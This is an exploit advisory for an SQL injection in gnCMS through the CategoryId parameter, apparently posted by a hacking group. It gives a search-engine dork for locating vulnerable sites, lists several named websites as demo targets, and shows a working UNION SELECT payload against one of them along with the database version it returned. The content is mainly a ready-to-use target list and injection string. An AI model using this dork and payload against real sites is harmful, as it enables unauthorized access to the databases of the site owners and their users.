[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*] [*] [*] Exploit Title : gnCMS SQL Injection [*] [*] Exploit Author : Ashiyane Digital Security Team [*] [*] Dork : intext:Created & Hosted by GroupNet powered by gnCMS inurl:CategoryId= [*] [*] Vendor Homepage : www.groupnet.gr [*] [*] Data : 2015.12.17 [*] [*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*] [*] [*] Admin Page ==> site.com/admin/ [*] [*] Demo : [*] [*] www.healthfilmfXestival.gr/index.php?module=news&position=center&ArticleId=129&CategoryId=[sql] [*] [*] www.myhba.grX/index.php?module=news&position=center&&CategoryId=[sql] [*] [*] www.epigramXma.gr/index.php?position=center&module=articles&CategoryId=[sql] [*] [*] www.aptcc.Xgr/index.php?module=news&position=center&ArticleId=236&CategoryId=[sql] [*] [*] www.myaXsfaleia.gr/index.php?module=news&position=center&&CategoryId=[sql] [*] [*] ,.... [*] [*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*] [*] [*] Exploit Examples : [*] [*] www.myXhba.gr/index.php?module=news&position=center&&CategoryId=-1 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- - [*] [*] THE VERSION IS 5.5.46-cll [*] [*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*] [*] [*] SPT To : Mahdi.Hidden [*] Discovered by : kcaher [*] [*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]